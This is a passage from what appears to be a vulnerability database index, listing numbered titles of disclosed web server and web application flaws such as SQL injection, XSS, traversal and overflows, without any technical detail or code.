Anonymous Bind [16838] BEA WebLogic Server Console Login Page XSS [16837] BEA WebLogic Malformed Cookie DoS [16836] BEA WebLogic Failed Login Password Disclosure [16835] BEA WebLogic User Sessions Persistence [16834] BEA WebLogic Security Exception Disclosure [16833] BEA WebLogic JDBC Connection Pool Unauthorized Access [16831] Aborior Encore WebForum display.cgi file Variable Command Execution [16805] Ipswitch IMail Web Calendaring Server GET Request Traversal Arbitrary File Access [16748] WebAPP apage.cgi f Variable Arbitrary Command Execution [16746] Gentoo webapp-config Temporary File Privilege Escalation [16730] Willing Webcam ww.exe Local Password Disclosure [16631] WebCT Campus Edition Multiple Tag XSS [16621] Fastream NETFile FTP/Web Server Port Scan Bounce Weakness [16620] Sigma ISP Manager sigmaweb.dll Malformed Input Error Message Information Disclosure [16593] Savant Web Server Encoded Filename Request Authorization Bypass [16592] Savant Web Server Malformed Content-Length DoS [16591] Savant Web Server cgitest.exe Overflow DoS [16590] Bajie HTTP Web Server Crafted Request File/Directory Disclosure [16519] MaxWebPortal register.asp Multiple Parameter SQL Injection [16518] MaxWebPortal privatesend_info.asp sendto Parameter SQL Injection [16517] MaxWebPortal privatedelete.asp id Parameter SQL Injection [16516] MaxWebPortal pop_profile.asp Multiple Parameter SQL Injection [16515] MaxWebPortal pop_delete.asp ID-Numbers Parameter SQL Injection [16514] MaxWebPortal pop_avatar_delete.asp Multiple Parameter SQL Injection [16513] MaxWebPortal pop_announce_delete.asp A_ID Parameter SQL Injection [16512] MaxWebPortal pm_view.asp id Parameter SQL Injection [16511] MaxWebPortal pm_pop_privatesend_info.asp REPLY_ID Parameter SQL Injection [16510] MaxWebPortal pm_delete2.asp Remove Parameter SQL Injection [16509] MaxWebPortal pic_pop_share.asp Multiple Parameter SQL Injection [16508] MaxWebPortal inc_function.asp FORUM_ID Parameter SQL Injection [16507] MaxWebPortal inc_top.asp Name Parameter SQL Injection [16506] MaxWebPortal pm_delete2.asp Multiple Parameter SQL Injection [16505] MaxWebPortal pop_profile.asp Cookie Variables SQL Injection [16504] MaxWebPortal search.asp andor Parameter SQL Injection [16503] MaxWebPortal post_info.asp Multiple Parameter SQL Injection [16502] MaxWebPortal inc_functions.asp fpassword Parameter SQL Injection [16501] MaxWebPortal post.asp Multiple Parameter XSS [16453] Jeuce Personal Web Server GET Request Overflow [16433] Mozilla Java Applet Arbitrary Web Page Content Disclosure [16427] Bugzilla URI Web Log Password Disclosure [16374] Cherokee Web Server PRINT_ERROR() Function Local Format String [16349] WebAPP Guestbook PRO Message Title XSS [16336] PostMaster Web Mail Error Message Account Enumeration [16318] MaxWebPortal custom_link.asp Multiple Parameter SQL Injection [16317] MaxWebPortal pic_toprated.asp SQL Injection [16316] MaxWebPortal links_toprated.asp SQL Injection [16315] MaxWebPortal dl_toprated.asp SQL Injection [16314] MaxWebPortal article_toprated.asp SQL Injection [16313] MaxWebPortal pic_rates.asp SQL Injection [16312] MaxWebPortal links_rate.asp SQL Injection [16311] MaxWebPortal dl_rate.asp SQL Injection [16310] MaxWebPortal article_rate.asp SQL Injection [16309] MaxWebPortal pic_popular.asp SQL Injection [16308] MaxWebPortal links_popular.asp SQL Injection [16307] MaxWebPortal dl_popular.asp SQL Injection [16306] MaxWebPortal article_popular.asp SQL Injection [16304] Open WebMail (OWM) Shell Escape Arbitrary Command Execution [16257] AJ Web Server Long URI Remote Overflow [16256] Ashleys Web Server HTTP Request Overflow [16213] IceWarp WebMail attachment.html File Enumeration [16212] IceWarp WebMail calendar_task.html id Variable Path Disclosure [16211] IceWarp WebMail calendar_event.html id Variable Path Disclosure [16210] IceWarp WebMail calendar_addevent.html id Variable Path Disclosure [16209] IceWarp WebMail calendarsettings.html Shared Calendars Parameter XSS [16208] IceWarp WebMail settings.html Signature Parameter XSS [16207] IceWarp WebMail addressaction.html XSS [16206] IceWarp WebMail address.html Multiple Parameter XSS [16198] YusASP Web Asset Manager assetmanager.asp [16178] SimpleCam Web Server Traversal Arbitrary File Access [16164] RSA SecurID Web Agent Remote Overflow [16154] 4D WebSTAR Tomcat Plugin URL Remote Overflow [16070] Web Crossing webx XSS [16067] 04WebServer Traversal Arbitrary File Access [16025] BEA WebLogic Memory Session Persistence Admin Authentication Bypass [16014] IBM Web Traffic Express Caching Proxy Server HTTP GET Request XSS [15993] MySQL MaxDB Webtool Remote getIfHeader() WebDAV Function Remote Overflow [15914] Fastream NETFile FTP/Web Server Traversal Arbitrary File Access [15910] Oracle webcacheadmin Multiple Parameter XSS [15909] Oracle webcacheadmin Arbitrary File Corruption [15908] Oracle Application Server Webcache Requests OHS mod_access Restriction Bypass [15895] BEA WebLogic Administration Console JndiFramesetAction server Parameter XSS [15894] JustWilliam's Amazon Webstore index.php Multiple Parameter XSS [15893] JustWilliam's Amazon Webstore closeup.php image Parameter XSS [15892] JustWilliam's Amazon Webstore Cookie Script Injection [15844] WheresJames Webcam Publisher Remote Overflow [15819] SqWebMail sqwebmail redirect Parameter CRLF Injection XSS [15817] MySQL MaxDB Web Tool getLockTokenHeader() Function Remote Overflow [15816] MySQL MaxDB Web Administration Service Malformed GET Request Overflow [15805] Novell Nsure Audit webadmin.exe ASN.1 Message Parsing DoS [15790] IBM WebSphere Application Server (WAS) Error Page XSS [15747] XEROX WorkCentre MicroServer Web Server SNMP System Config Modfiication [15732] Yawcam Web Server Traversal Arbitrary File Access [15723] netMailshar Webmail Service Error Message Username Enumeration [15722] netMailshar Webmail Service Traversal Arbitrary File Access [15709] geneweb Maintainer Scripts Arbitrary File Manipulation [15707] Microsoft Windows Explorer Web View Arbitrary Script Insertion [15699] Sun Java System Web Proxy Server Unspecified Remote Overflow [15668] WebCT Discussion Board Message Field XSS [15667] Simple Web Server (SWS) GET Request Remote Overflow [15666] WebcamXP User Name Overflow DoS [15665] WebcamXP Chat Name XSS [15637] Apple Mac OS X AppleWebKit Local Domain JavaScript Execution [15589] Oracle PeopleSoft EnterpriseOne Web Applications Wide Impact Unspecified Issue [15551] Kerio MailServer Webmail Unspecified Malformed E-Mail DoS [15550] Webmin/Usermin Configuration File Permission/Ownership Modification [15548] Usermin Web Mail Module Unspecified XSS [15513] RSA Authentication Agent for Web for IIS IISWebAgentIF.dll XSS [15504] Sun Java System Web Server Unspecified Remote DoS [15501] IBM WebSphere Application Server (WAS) Malformed Host: Header JSP Source Disclosure [15450] iWebNegar Administrator Login Page SQL Injection [15449] iWebNegar comments.php SQL Injection [15438] Oracle Web Cache HTTP Request Method Header Overflow [15434] KDE KMail User Interface HTML Overlay Spoofing [15409] PHP-Nuke Web_Links show Variable Path Disclosure [15408] PHP-Nuke Web_Links Multiple Parameter SQL Injection [15398] PHP-Nuke Web_Links Module Multiple Parameter XSS [15394] PALS Library System WebPALS pals-cgi Arbitrary Command Execution [15391] Webfroot shoutbox.php conf Parameter Traversal Arbitrary File Access [15381] BEA WebLogic Server JMS Domain Routing User Password Disclosure [15380] BEA WebLogic config.cmd Log File Admin Credential Cleartext Disclosure [15354] WebWasher CSM Conf Script navTo2 Parameter XSS [15320] Logics Software logwebftbs2000.exe Arbitrary File Access [15319] IBM Lotus Domino Web Service NLSCCSTR.DLL Malformed GET Request Overflow DoS [15255] Spymac WebOS network.php tos Parameter XSS [15254] Spymac WebOS newpoll.php Multiple Parameter XSS [15253] Spymac WebOS manager.php Multiple Parameter XSS [15252] Spymac WebOS newthread.php Multiple Parameter XSS [15251] Spymac WebOS newreply.php threadid Parameter XSS [15250] Spymac WebOS threadlist.php catid Parameter XSS [15249] Spymac WebOS showthread.php threadid Parameter XSS [15248] Spymac WebOS notes.php Multiple Parameter XSS [15247] Spymac WebOS upload_picture.php poll Parameter XSS [15246] Spymac WebOS show_pics.php Multiple Parameter XSS [15245] Spymac WebOS show_photo.php picid Parameter XSS [15244] Spymac WebOS member.php memberid Parameter XSS [15243] Spymac WebOS index.php Multiple Parameter XSS [15236] Turnkey Websites SearchResults.php Multiple Parameter SQL Injection [15225] MaxWebPortal Personal Message SendTo Parameter XSS [15202] Cisco Storage Router Gigabit Interface Fragmented Packet DoS [15197] MaxWebPortal events_functions.asp EVENT_ID Parameter SQL Injection [15196] MaxWebPortal links_add_form.asp Banner XSS [15182] WebCalendar username SQL Injection [15118] FastStone 4in1 Browser Web Server Traversal Arbitrary File Access [15105] web-app.org WebAPP Encoded Request .dat File Disclosure [15062] IceWarp WebMail calendar.html Path Disclosure [15061] IceWarp WebMail Multiple File Weak User Info Encryption [15022] Boa Web Server Direct Request Arbitrary File Access [14992] MCPWS Personal Webserver Malformed File Request DoS [14930] SurgeMail Webmail attach_id Variable Traversal Arbitrary File / Directory Write [14899] Sun Java Web Start JNLP File Arbitrary Command Execution [14821] HP JetDirect JetAdmin Telnet Interface Password Sync Issue [14806] GoodTech Telnet Server Admin Web Server Remote Overflow [14799] ArbitroWeb rawurl Parameter XSS [14798] eXtropia Web Store web_store.cgi page Parameter Command Execution [14792] eXtropia Web Store html_web_store.cgi Traversal Arbitrary File Access [14772] IBM WebSphere Commerce ResetPassword Servlet Caching Information Disclosure [14767] MaxDB/SAP DB Web Agent Multiple Function Remote DoS [14747] Spinworks Web Server Malformed sid Parameter DoS [14726] WebGUI ENV HTTP Variable Spoofing [14725] WebGUI DataForm Field Manipulation Information Disclosure [14724] WebGUI Crafted URL Arbitrary Post Edit [14722] WebGUI Denied Post Security Issue [14721] WebGUI File Manager Direct Access Arbitrary File Access [14720] WebGUI Nt Login Name Authentication Bypass [14719] WebGUI Collateral Manager Arbitrary Collateral Deletion [14718] WebGUI Collateral.pm Arbitrary Collateral Deletion [14717] WebGUI Error Message Admin Username Information Disclosure [14716] WebGUI Registered User Unspecified Privilege Escalation [14715] WebGUI LDAP Authentication Invalid Password Bypass [14714] WebGUI Unauthorized User Setting Edit [14713] WebGUI Unspecified Macro Processing Security Issue [14712] WebGUI Unspecified Attachment Issue [14711] WebGUI Poll Unauthorized Vote [14698] Novell NetMail Modweb Agent Unspecified Overflow [14659] XEROX Document Centre Web Server Unspecified Unauthorized Access [14658] XEROX MicroServer Web Server Directory Navigation Crafted URL DoS [14642] Active WebCam Connection Saturation DoS [14641] Active WebCam Error Message File Existence Enumeration [14640] Active WebCam Nonexistent File Path Disclosure [14639] Active WebCam Filelist.html Request DoS [14638] Active WebCam Floppy Disk Request DoS [14636] WEBInsta Mailing List Manager initdb.php Remote File Inclusion [14630] phpWebLog Links Addon index.php Remote File Inclusion [14629] phpWebLog init.inc.php Remote File Inclusion [14579] XEROX WorkCentre MicroServer Web Server Unspecified Restriction Bypass [14535] WebEasyMail POP3 Service Error Message Account Enumeration [14534] WebEasyMail SMTP Service Request Format String [14527] GeneWeb Daemon Crafted Request Arbitrary File Access [14524] iPlanet WebServer Admin Server Perl Script open() Function Arbitrary Command Execution [14523] Sun iPlanet WebServer Admin Server Error Log XSS [14521] Courier sqwebmail Startup Sequence Arbitrary File Access [14516] Xeneo Web Server Malformed GET Request DoS [14514] Simple Web Server (SWS) Multiple Slash Arbitrary Restricted File Access [14511] WebServer 4 Everyone HTTP GET Request Remote Overflow [14486] IC9 Pocket Print Server Admin Web Server Long Password DoS [14485] DB4Web Server Debug Mode TCP Port Scanning Proxy [14484] DB4Web Server db4web_c Filename Request Traversal Arbitrary File Access [14483] Brother NC-3100h Printer Admin Web Server Password Overflow [14479] KeyFocus (KF) Web Server Malformed HTTP Header Overflow [14477] 4D Web Server Long HTTP Request Overflow [14472] EMUMAIL Webmail emumail.cgi Path Disclosure [14448] Falcon Web Server Malformed URL Restricted File Access [14438] Critical Path inJoin iCon Admin Web Server LOG Parameter Absolute Path Arbitrary File Access [14419] 4D WebServer HTTP Basic Authentication Multiple Parameter Overflows [14407] Galacticomm Worldgroup Web Server Crafted HTTP GET Request Parsing Overflow [14344] Falcon Web Server Malformed URL Restricted File Authentication Bypass [14334] BRS WebWeaver HTTP Server Password Protection Bypass [14268] Beck IPC GmbH IPC@Chip Web Server chipcfg.cgi Direct Request Information Disclosure [14266] Beck IPC GmbH IPC@Chip Web Server Long HTTP Request DoS [14252] Web Server 4D/eCommerce Traversal Arbitrary File Access [14240] WebMod server.cpp Malformed POST Query Content-Length Overflow [14237] CIS WebServer Traversal Arbitrary File Access [14228] ELSA Lancom Office Web Admin Server Admin Password Remote Disclosure [14211] phpWebSite Search Module Path Disclosure [14173] WEBsweeper Unicode Filter Bypass [14172] WEBsweeper Malformed SCRIPT Tag Filter Bypass [14143] Webridge PX Application Suite Malformed Request Information Disclosure [14127] phpWebSite Image Announcement Upload Arbitrary Command Execution [14116] Xcache Webserver Content-PageName Header Absolute Path Disclosure [14101] phpMyAdmin /libraries/database_interface.lib.php Direct Request Path Disclosure [14100] phpMyAdmin database_interface.lib.php cfg Parameter XSS [14095] phpMyAdmin database_interface.lib.php Local File Inclusion [14010] WebConnect jretest.html Traversal Arbitrary File Access [14009] WebConnect MS-DOS Device Name Request DoS [14006] Xinkaa WEB Station Traversal Arbitrary File Access [13997] Kebi WebMail /a/ Directory Remote Privilege Escalation [13963] Beck IPC GmbH IPC@Chip Embedded-Webserver Server Root Arbitrary File Access [13962] iPlanet Web Server HTTP Request Long Method Name Overflow [13961] OReilly WebBoard Pager Paging Function Malformed Javascript DoS [13918] WebCalendar login.php webcalendar_session Cookie SQL Injection [13885] Netcruiser Web Server Device Name URL Path Disclosure [13882] WEBsweeper Large HTTP Referrer: Header Handling Remote Memory Exhaustion DoS [13880] BRS WebWeaver FTP Server Malformed CD / ls Command Parsing Path Disclosure [13868] Caucho Resin Malformed WEB-INF Specifier Javabean File Source Disclosure [13860] WebReflex HTTPd Long HTTP GET Request Overflow [13843] HP Web-enabled Management Software HTTP Server Remote Overflow [13830] PHP-Nuke Web_Links Module newlinkshowdays Parameter XSS [13828] PHP-Nuke Web_Links Module Path Disclosure [13801] WebMaster ConferenceRoom IRC Server Clone Buddy Relationship Remote DoS [13788] Open WebMail openwebmail.pl logindomain Parameter XSS [13772] Gentoo Webmin miniserv.users Encrypted Root Password Remote Disclosure [13770] IBM WebSphere Application Server (WAS) Encoded Space (%20) Request JSP Source Code Disclosure [13755] PostACI Webmail System global.inc Direct Request Information Disclosure [13749] Webteachers Webdata Import File Arbitrary File Access [13694] NetWin dMailWeb / cwMail POP Server username Parameter DoS [13693] NetWin dMailWeb / cwMail POP Server pophost Parameter DoS [13683] Netwin DNews News Server DNEWSWEB QUERY_STRING Overflow [13682] Netwin DMailWeb QUERY_STRING Remote Overflow [13665] FileMaker Pro 5 Web Companion Arbitrary Mail Relay [13655] WebObjects Developer WebObjects.exe HTTP Request Long Header Overflow [13629] WebTV Email Client Stored Mail Access [13621] Microsoft Outlook Web Access (OWA) owalogon.asp Redirection Account Enumeration [13590] 602LAN SUITE Webmail Traversal Arbitrary File Upload [13532] Savant Web Server HTTP Version Overflow [13531] TinyWeb Server Malformed CGI Request DoS [13455] Net-SNMP snmpnetstat Tool Interface List Request Parsing Remote Overflow [13441] Microsoft Windows 2000 Security Interface Change Password Option Account Enumeration [13433] Microsoft IIS WebDAV MKCOL Method Location Server Header Internal IP Disclosure [13432] Microsoft IIS WebDAV WRITE Location Server Header Internal IP Disclosure [13431] Microsoft IIS WebDAV Malformed PROPFIND Request Internal IP Disclosure [13404] Novell NetWare Enterprise Web Server /com Directory Indexing [13403] Novell NetWare Enterprise Web Server /com/novell/webaccess Directory Indexing [13402] Novell NetWare Enterprise Web Server /com/novell/ Directory Indexing [13385] Microsoft IIS WebDAV Long PROPFIND/SEARCH Request DoS [13377] IceWarp WebMail importaction.html Arbitrary File Manipulation [13376] IceWarp WebMail calendar_y.html id Variable Path Disclosure [13375] IceWarp WebMail calendar_w.html id Variable Path Disclosure [13374] IceWarp WebMail calendar_m.html id Variable Path Disclosure [13373] IceWarp WebMail calendar_d.html id Variable Path Disclosure [13372] IceWarp WebMail calendar_addevent.html Multiple Parameter XSS [13371] IceWarp WebMail calendar_addtask.html Note Parameter XSS [13370] IceWarp WebMail calendar_addnote.html Title Parameter XSS [13369] IceWarp WebMail accountsettings_add.html accountid Parameter XSS [13368] IceWarp WebMail login.html username Parameter XSS [13344] Eternal Lines Web Server Connection Saturation DoS [13324] Alt-N WebAdmin modalframe.wdm Arbitrary HTML Injection [13323] Alt-N WebAdmin useredit_account.wdm Arbitrary Account Modification [13322] Alt-N WebAdmin useredit_account.wdm user Parameter XSS [13321] Captaris Infinite Mobile Delivery Webmail Path Disclosure [13320] Captaris Infinite Mobile Delivery Webmail XSS [13316] Novell NetWare websinfo.bas Information Disclosure [13312] Novell NetWare Web Server env.pl Information Disclosure [13311] Novell NetWare Web Server test.jse Information Disclosure [13310] Novell NetWare Web Server allfield.jse Information Disclosure [13309] RSA SecurID WebID Traversal Arbitrary File Access [13308] RSA SecurID WebID sdiis.dll Direct Request DoS [13307] RSA SecurID WebID Null Character Debug Mode Information Disclosure [13306] Netscape / iPlanet Web Server ?wp-html-rend DoS [13305] Netscape / iPlanet Web Server ?wp-force-auth Brute Force Weakness [13296] Netscape Enterprise Server Manager Web Log Viewer JavaScript Injection [13295] GoAhead WebServer Crafted File Request Script Source Disclosure [13251] OReilly WebSite Pro uploader.exe Arbitrary Remote File Creation [13246] Winmail Server Webmail Web Administration User Information XSS [13234] WebWasher Classic Server Mode Arbitrary Proxy CONNECT Request [13208] Mobius DocumentDirect Web Authorization Form Username Overflow DoS [13178] CamShot WebCam Long Authorization Header Overflow [13170] BRIBBLE webadmin Authentication Bypass [13145] SquirrelMail webmail.php XSS [13143] Trend Micro Control Manager Web Application Login Replay Weakness [13142] Novell GroupWise WebAccess webacc Information Disclosure [13141] Novell GroupWise WebAccess webacc Error Document Authentication Bypass [13135] Novell GroupWise WebAccess Error Module Username XSS [13134] Novell GroupWise WebAccess Error Module About Page XSS [13090] Webodex CGI Script Remote File Inclusion [13086] MySQL MaxDB Web Agent Malformed HTTP Header DoS [13085] MySQL MaxDB Web Agent WebDAV sapdbwa_GetUserData() Function Remote DoS [13021] Novell GroupWise WebAcces WebAccessUninstall.ini Information Disclosure [12970] NetXRay web-admin Tool HTTP Request Overflow [12963] O'Reilly WebSite Pro args.bat Arbitrary Command Execution [12962] O'Reilly WebSite Pro args.cmd Arbitrary Command Execution [12935] m0n0wall mini_httpd webGUI Server Malformed Connection DoS [12919] MySQL MaxDB WebAgent websql Remote Overflow [12880] Bottomline Webseries Arbitrary Report Execution [12879] Bottomline Webseries Password Change Does Not Require Previous Credentials [12878] Bottomline Webseries Password Restriction Bypass [12877] Bottomline Webseries BTInteractiveViewer.asp File/Directory Enumeration [12876] Bottomline Webseries SaveUser.asp Admin Authentication Bypass [12875] Bottomline Webseries HTTP Variable Information Disclosure [12874] eMotion MediaPartner Web Server Traversal Arbitrary File Access [12873] eMotion MediaPartner Web Server XSS [12872] eMotion MediaPartner Web Server BHTML Source Disclosure [12871] eMotion MediaPartner Web Server Arbitrary User Password Change [12800] iWebNegar conf_edit.php Arbitrary Code Injection [12784] Dillo Web Browser file.c Unspecified Overflows [12772] Rpm Finder (rpf) web() Procedure Remote Overflow [12719] Jeuce Personal Web Server Malformed URL DoS [12718] Jeuce Personal Web Server Traversal Arbitrary File Access [12680] KorWeblog index.php G_PATH Variable Arbitrary Command Execution [12679] KorWeblog index.php lng Parameter Arbitrary File Access [12671] Nombas ScriptEase MiniWeb Server Long URL Overflow [12559] SurgeMail Webmail Unspecified Security Issue [12547] ASP Calendar main.asp Unauthorized Admin Interface Access [12489] WebCalendar Multiple Unspecified Security Issues [12488] WebCalendar Layer Functionality Arbitrary Content Access [12487] WebCalendar nonuser Admin Unspecified Security Issue [12486] WebCalendar read-only Permission Arbitrary Content Manipulation [12467] uml-utilities Unprivileged eth0 Interface Disable DoS [12462] pgn2web process_moves() Function PGN File Overflow [12417] iWebNegar index.php string Parameter SQL Injection [12406] Sun Java Messaging Server Webmail XSS [12405] vWebServer Multiple Long URL Request DoS [12404] vWebServer MS-DOS Device Name GET Request DoS [12403] vWebServer Encoded Space (%20) Request Arbitrary ASP Script Disclosure [12402] Hosting Controller Default AdvWebadmin Account [12353] Sun Java System Web/Application Server Session ID Disclosure [12309] Essentia Web Server Long URL Request Parsing Overflow DoS [12307] Nombas ScriptEase Mini WebServer Malformed GET Request DoS [12275] MySQL MaxDB Web Tools wahttp Nonexistent File Request DoS [12274] MySQL MaxDB Web Tools WebDAV Handler Remote Overflow [12273] WebLibs weblibs.pl Traversal Arbitrary File Access [12231] Apache Tomcat web.xml Arbitrary File Access [12223] Jana Web Server Encoded Traversal Arbitrary File Access [12205] Savant Web Server File Parameter Overflow [12204] Savant Web Server Host HTTP Header Overflow [12185] IBM WebSphere Commerce Database Update Information Disclosure [12179] Big Medium Web Directory Arbitrary File Upload [12114] KorWeblog viewimg.php Arbitrary Directory Listing [12101] Fastream NETFile FTP/Web Server HEAD Request Saturation DoS [12088] SLWebMail3 globallogin.dll CompanyID Parameter Remote Overflow [12087] SLWebMail3 admin.dll CompanyID Parameter Remote Overflow [12086] SLWebMail3 recman.dll CompanyID Parameter Remote Overflow [12085] SLWebMail3 showlogin.dll Language Parameter Remote Overflow [12084] SLWebMail WebMailReq.dll Malformed Request Path Disclosure [12074] aldweb miniPortail admin.php Cookie Manipulation Privilege Escalation [12068] Mac OS 9 Personal Web Sharing Long HTTP Request Parsing Remote DoS [12064] Lightwave ConsoleServer Admin Interface pre-login Mode Information Disclosure [12061] WebGUI User Profile Unspecified Issue [12055] Snowblind Web Server Malformed HTTP Request DoS [12054] Snowblind Web Server Long HTTP Request Overflow [12043] MDaemon WebConfig Server MSDOS Device Request DoS [12041] MDaemon Webconfig IMAP Malformed URL DoS [12038] MDaemon WebConfig Server HTTP URL Remote Overflow [12034] MDaemon WebConfig HTTP Server URL Overflow Remote DoS [11998] web-cp Unprivileged Alias Creation E-mail Interception [11997] web-cp Duplicate Username Arbitrary Document Access [11978] Google Desktop Search Web History Persistence [11888] Polycom ViewStation Web Server Unicode Request Arbitrary File Access [11869] iPlanet Web Server Search Component NS-rel-doc-name Parameter Remote Overflow [11868] StepWeb Search Engine admin.html Password Disclosure [11865] SCO UnixWare scohelphttp Web Server search97cgi/vtopic Traversal Arbitrary File Access [11833] IceWarp WebMail Account Settings Unspecified Issue [11802] Respondus for WebCT WEBCT.SVR File Weak Encryption [11743] ipmasq External Interface Packet Forward Restriction Bypass [11741] Foxweb foxweb.exe Long URL Remote Overflow [11740] Foxweb foxweb.dll Long URL Remote Overflow [11715] Webroot Spy Sweeper Enterprise Admin Passord Local Disclosure [11699] WEB-DAV Linux File System dav2fs Symlink Arbitrary File Overwrite [11694] phpWebSite index.php HTTP Response Splitting [11692] Roxen Web Server Enable Userlisting Failure [11689] Roxen Web Server MySQL Socket Permission Weakness [11688] Roxen Web Server Period Append pike Script Source Disclosure [11687] Roxen Web Server Redirect Module Failure Information Disclosure [11686] Roxen Web Server LDAP-userdb Authentication .htaccess Bypass [11684] Roxen Web Server Auth API Failure Filesystem Privilege [11683] Roxen Web Server Traversal Arbitrary File Access [11682] Roxen Web Server Show Internal Errors Port Bind Arbitrary File Access [11681] Roxen Web Server SQLuserdb.pike userinfo() Function SQL Injection [11680] Roxen Web Server Admin Encrypted Password Local Disclosure [11679] Roxen Web Server Overlayed Filesystem Security Pattern Content Disclosure [11677] IMHO Webmail Module for Roxen REFERER Error Page Previous Login Session Disclosure [11666] Multiple Web Server printenv CGI Information Disclosure [11654] SAP DB web-tools Default Services Information Disclosure [11640] Xitami Web Server /aux Request DoS [11634] Netscape / iPlanet Multiple Web Publishing Tag Forced Directory Listing [11621] GNATS GnatsWeb gnatsweb.pl Arbitrary Command Execution [11620] WebCalendar upcoming.php Privilege Escalation [11619] WebCalendar view_entry.php Privilege Escalation [11618] WebCalendar validate.php Path Disclosure [11617] WebCalendar init.php Crafted Request Path Disclosure [11616] WebCalendar init.php user_inc Variable Arbitrary Command Execution [11615] WebCalendar login.php HTTP Response Splitting [11614] WebCalendar styles.php Multiple Parameter XSS [11613] WebCalendar trailers.php user Parameter XSS [11612] WebCalendar datesel.php Multiple Parameter XSS [11611] WebCalendar usersel.php form Parameter XSS [11610] WebCalendar view_d.php id Parameter XSS [11609] WebCalendar view_entry.php id Parameter XSS [11608] 04WebServer MS-DOS Device Name Request DoS [11607] 04WebServer Log File Arbitrary Content Injection [11606] 04WebServer Error Page XSS [11583] Sun ONE Messaging Server Webmail Session Hijacking [11576] NETGEAR DG834 Firewall Router Web Admin Connection Saturation DoS [11565] IceWarp WebMail Account Password Storage Weak Encryption [11564] IceWarp WebMail folders.html Arbitrary File/Directory Rename [11563] IceWarp WebMail viewaction.html Arbitrary File Manipulation/Deletion [11561] IceWarp WebMail viewaction.html Arbitrary Directory Creation [11560] IceWarp WebMail folderitem.html folderold Parameter XSS [11559] IceWarp WebMail attachment.html Multiple Parameter XSS [11558] IceWarp WebMail send.html Multiple Parameter XSS [11528] 602LAN SUITE Webmail POST Request CPU Consumption DoS [11489] Network Flight Recorder (NFR) webd Overflow [11485] BackWeb Polite Agent Protocol Race Condition Server Spoofing [11481] WebRamp Malformed HTTP Request DoS [11480] WebRamp Port 5353 Malformed UDP Packet Unauthorized IP Address Modification [11460] Microsoft Windows RPC DCOM Interface epmapper Pipe Hijack Local Privilege Escalation [11433] WebSiteTool Shopping Cart Hidden Form Field Arbitrary Data Manipluation [11404] Sun ONE Web Server ClassCache Directories Permission Weakness [11403] Sun ONE Web Server WebPub/Remote File Manipulation Feature Directory Listing [11402] Sun ONE Web Server LDAP Wildcard Authentication [11401] Sun ONE Web Server Accept-language Unspecified Issue [11388] Web Forum Server .ini File Cleartext Password Disclosure [11387] Web Forum Server Traversal Arbitrary File Access [11383] Sun Java System Web / Application Server Malformed Client Certificate DoS [11382] LakeWeb Filemail Recipient Address Command Execution [11381] LakeWeb Mail List Recipient Address Command Execution [11359] HP MPE/iX Architected Interface Facility (AIF) AIFCHANGELOGON Remote Privilege Escalation [11358] HP Web JetAdmin Port 8000 Malformed URL Parsing Remote DoS [11347] Cyberstop Web Server HTTP GET Request Parsing Remote DoS [11346] Cyberstop Web Server MS-DOS Device HTTP Request DoS [11345] Cyberscheduler websync.exe Timezone Variable Parsing Remote Overflow [11322] MailEnable Professional Unspecified Webmail Issue [11321] Cherokee Web Server auth_pam Authentication Format String [11317] Compaq WEBES Service Tools Arbitrary Local File Access [11304] Sun Java System Web Proxy Server Overflow [11284] HP-UX VVOS iPlanet Web Server Unspecified Data Corruption Issue [11269] OpenLink Web Configurator GET Request Remote Overflow [11261] Sun Web-Based Enterprise Management (WBEM) World Readable Install Password [11255] Caudium Web Server Malformed HTTP Request DoS [11195] Cyber Web Filter IP Address Bypass [11150] OpenWFE Web Client Port Scan Relay [11149] OpenWFE Web Client Login Form XSS [11093] Abyss Web Server abyss.conf Admin Cleartext Password Disclosure [11092] Pi3Web Name Column Sorting Malformed URL DoS [11091] Pi3Web Malformed GET Request Remote Overflow [11090] Pi3Web Wildcard HTTP Request Arbitrary File Access [11043] cPanel Webmail Truncated Password Weakness [11006] Abyss Web Server MS-DOS Device Names DoS [10994] Microsoft DirectX Files Viewer ActiveX Control xweb.ocx Overflow [10980] FTP Voyager ActiveX Control IObjectSafety Interface Arbitrary Command Execution [10946] SalesLogix slxweb.dll Database Information Disclosure [10945] SalesLogix slxweb.dll/view id Parameter SQL Injection [10944] SalesLogix slxweb.dll Invalid Filename Path Disclosure [10928] Novell NetWare Perl Web Handler -v Option Information Disclosure [10920] Novell NetWare Multiple Web Server HTTP GET Saturation DoS [10918] Novell Web Server convert.bas URI Traversal Arbitrary File Access [10894] Moby Netsuite Web Server Long HTTP Request Overflow [10893] Easycom/Safecom Print Server Web Service HTTP Request Overflow [10892] Netscape Enterprise Server Web Publishing Feature REVLOG Command DoS [10891] Picserver Web Server Traversal Arbitrary File Access [10889] 24Link Web Server Special Character GET Request Access Restriction Bypass [10888] QNX 405 Voyager Web Server .photon Directory Information Disclosure [10887] MERCUR WebView WebMail Server mail_user Parameter DoS [10886] Sambar Web Server Long HTTP GET Request Overflow [10885] iPlanet Web Server on Oracle ndwfn4.so HTTP Request Remote Overflow [10884] BiblioWeb Web Server Long HTTP Request Overflow [10882] Sun AnswerBook2 Web Server dwhttpd HTTP GET Request Format String DoS [10881] QNX Voyager Web Server Embedded Resource Manager embedded.html Information Disclosure [10880] Sun Java Web Server com.sun.server.http.pagecompile.jsp92.JspServlet Arbitrary Code Execution [10879] Roxen Web Server htmlparse.pike RXML Recursive Parsing DoS [10878] Sun AnswerBook2 Web Server dwhttpd Malformed Content-Length DoS [10864] Marconi ASX-1000 Switches Multiple Interface Malformed Packet DoS [10849] Ipswitch IMail Web Messaging Server Arbitrary User Information Modification [10843] Ipswitch IMail Web Service Long URL Overflow [10829] IBM Lotus Notes/Domino Web Retriever Client Long HTTP Status Line DoS [10827] IBM Lotus Domino Web Server s_Validation Form Malformed Value Field POST Request DoS [10824] IBM Lotus Domino Web Server h_PageUI Form Incomplete POST DoS [10822] IBM Lotus Domino Question Mark HTTP Request Web Handler Bypass [10819] IBM Lotus Domino Web Server $defaultNav Information Disclosure [10818] IBM Lotus Domino Web Server Malformed GET Request Internal IP Address Disclosure [10803] Webmin/Usermin miniserv.pl Base-64 String Metacharacter Handling Session Spoofing [10802] Webmin/Usermin Auth Information Control Character Bypass Arbitrary User Authentication [10765] Express-Web Content Management System default.asp Multiple Parameter XSS [10745] CUPS HTTP Interface Remote Overflow [10688] Microsoft Windows WebDAV XML Message Handler Malformed Request DoS [10675] Squid Web Proxy Cache SNMP Module asn_parse_header() Function Remote DoS [10674] IceWarp WebMail Multiple Unspecified XSS [10673] IceWarp WebMail view.html File View Unspecified Issue [10638] Turbo Traffic Trader Nitro ttt-webmaster.php Multiple Method XSS [10532] 